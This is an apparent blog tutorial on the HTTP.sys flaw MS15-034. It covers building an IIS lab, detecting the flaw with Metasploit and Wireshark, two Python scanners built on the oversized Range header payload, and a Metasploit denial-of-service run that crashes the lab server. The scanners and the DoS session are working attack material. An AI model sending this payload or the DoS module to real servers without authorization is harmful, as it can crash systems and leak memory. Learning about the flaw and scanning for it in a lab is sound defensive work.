Exploiting MS15-034, and writing a scanner for it with a Python crawler
程序员文章站
2024-03-18 10:55:34
MS15-034 (CVE-2015-1635) is a high-severity vulnerability in HTTP.sys.
Judging from Microsoft's official bulletin, quite a few systems are affected (Windows 7, 8 and 8.1, Server 2008 R2, 2012 and 2012 R2), so this post records the process of studying the vulnerability.
The bulletin gives the cause: a remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploits this vulnerability can execute arbitrary code in the context of the System account.
In other words, a specially crafted request (a PoC) is enough to trigger it. Because the bug lives in HTTP.sys rather than in IIS itself, any service that listens through HTTP.sys is exposed, although IIS is the usual target.
The lab environment for this exercise is built on Windows Server 2008 R2:
Open Server Manager and choose Add Roles.
Select the Web Server (IIS) role.
The introduction page explains what the role is for; click Next.
On the role services page tick HTTP Redirection and all of the Management Tools options, then click Next.
Confirm that the selected features are correct and start the installation.
After the installation completes, close the wizard and browse to the server's address from a second VM (Windows 7) to confirm IIS is serving pages.
Once the environment is up, open msf and check whether the vulnerability is present; start Wireshark in the background before typing run so that the check request gets captured.
msf5 > search ms15-034

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure

msf5 > use 1
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > show options

Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   SUPPRESS_REQUEST  true             yes       Suppress output of the requested resource
   TARGETURI         /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS           1                yes       The number of concurrent threads (max one per host)
   VHOST                              no        HTTP server virtual host

msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > set rhosts 192.168.3.51
rhosts => 192.168.3.51
msf5 auxiliary(scanner/http/ms15_034_http_sys_memory_dump) > run

[+] Target may be vulnerable...
[+] Stand by...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
As soon as the module runs it reports that the target is probably vulnerable. Switch to Wireshark and apply the display filter
http and ip.dst eq 192.168.3.51
You can see that msf sent a crafted HTTP request carrying a deliberately malformed header. Following the HTTP stream reveals the payload: Range: bytes=0-18446744073709551615. That upper bound is 2^64-1, the largest unsigned 64-bit value, which is exactly what the vulnerable range parser mishandles. An unpatched host answers 416 Requested Range Not Satisfiable, whereas a patched host rejects the header with 400 Bad Request ("The request has an invalid header name"); that difference is how the module tells the two apart without crashing the target.
Now to write our own scanner. The idea is simply to send the same crafted request with Python's requests library and inspect the response.
import sys
import requests

# Usage: python3 ms15_034.py <host>
url = "http://" + sys.argv[1]
r = requests.get(url, timeout=5)
# A missing Server header must not crash the scanner with a KeyError
remote_server = r.headers.get("Server", "")

# str.find() returns -1 when the substring is absent, and -1 is truthy, so the
# original `if s.find("IIS/7.5") or s.find("IIS/8.0")` matched every server.
# Use `in` instead; IIS 8.5 (Server 2012 R2) is also in the affected list.
if any(v in remote_server for v in ("IIS/7.5", "IIS/8.0", "IIS/8.5")):
    payload = {"Host": "stuff", "Range": "bytes=0-18446744073709551615"}
    r1 = requests.get(url, headers=payload, timeout=5)
    print(r1.request.headers)  # show the custom headers that were actually sent
    # Unpatched HTTP.sys answers 416 Requested Range Not Satisfiable (the phrase
    # also appears in its error page); a patched host returns 400 instead.
    # Checking the status code avoids the same find() == -1 bug on the body.
    if r1.status_code == 416:
        print(url + " -- MS15-034 vulnerable")
    else:
        print(url + " -- MS15-034 not present")
else:
    print(url + " -- server is not IIS/7.5, 8.0 or 8.5")
Running it:
aaa@qq.com:~/python/test# python3 ms15_034.py 192.168.3.51
{'User-Agent': 'python-requests/2.22.0', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
http://192.168.3.51 -- MS15-034 vulnerable
aaa@qq.com:~/python/test#
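As an added example (not code from the original post), here is a raw-socket version of the same check that the Wireshark capture and the requests-based scanner above both show. It builds the request byte for byte, parses the reply, and classifies it as vulnerable (416), patched (400 with the "invalid header name" body) or not applicable (a non-IIS Server header), so the verdict does not depend on the requests library or on a substring search over the body. The three sample responses at the bottom are constructed, not real captures, so the classification logic can be exercised offline; the function names and verdict strings are my own. It only ever sends the 0- range, which HTTP.sys answers safely, and deliberately does not use the non-zero starting offset that the msf DoS module relies on.

```python
import socket
import sys

# Same Range value the msf check and the scanner above send (upper bound 2^64-1).
CHECK_RANGE = b"bytes=0-18446744073709551615"


def build_check_request(host, path="/"):
    """Raw HTTP/1.1 request carrying the MS15-034 check header."""
    return (
        b"GET " + path.encode() + b" HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"Range: " + CHECK_RANGE + b"\r\n"
        b"Connection: close\r\n\r\n"
    )


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status_code = int(lines[0].split(b" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return status_code, headers, body


def classify_response(raw):
    """Map the reply to the check request onto a verdict.

    416 -> HTTP.sys accepted the oversized range: unpatched.
    400 with 'invalid header name' -> patched HTTP.sys rejected the header.
    Non-Microsoft Server header -> the check does not apply.
    """
    status, headers, body = parse_response(raw)
    server = headers.get("server", "")
    if "Microsoft-IIS" not in server and "Microsoft-HTTPAPI" not in server:
        return "not-iis"
    if status == 416:
        return "vulnerable"
    if status == 400 and b"invalid header name" in body.lower():
        return "patched"
    return "unknown"


def scan(host, port=80, timeout=5):
    """Send the check to a live host and classify its answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_check_request(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify_response(b"".join(chunks))


# Constructed sample responses (not real captures) so the logic runs offline.
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Content-Length: 0\r\n\r\n"
)
SAMPLE_PATCHED = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"Server: Microsoft-HTTPAPI/2.0\r\n"
    b"Connection: close\r\n\r\n"
    b"<h1>Bad Request</h1><p>The request has an invalid header name.</p>"
)
SAMPLE_OTHER = (
    b"HTTP/1.1 416 Range Not Satisfiable\r\n"
    b"Server: nginx/1.18.0\r\n\r\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(sys.argv[1], scan(sys.argv[1]))
    else:
        for name, sample in (("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
            print(name, "->", classify_response(sample))
```

Run it with a host argument to scan a live target; with no argument it only classifies the constructed samples. Keying the verdict on the status code plus the Server header means a 416 from nginx or Apache (a perfectly normal reply to an absurd Range) is not reported as MS15-034.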
If the vulnerability is present it can be exploited; if I remember correctly msf also has a module for that.
msf5 > search ms15-034   # search for MS15-034 modules

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure

msf5 > use 0   # pick the first module, the DoS
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > show options   # list the options that need setting

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.3.51   # set the target
rhosts => 192.168.3.51
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The moment the request went out, the target blue-screened. The fix is the MS15-034 update (KB3042553); Microsoft's documented workaround for hosts that could not be patched immediately was to disable IIS kernel caching.
Disclaimer: this article is for learning purposes only; do not use it for illegal activities.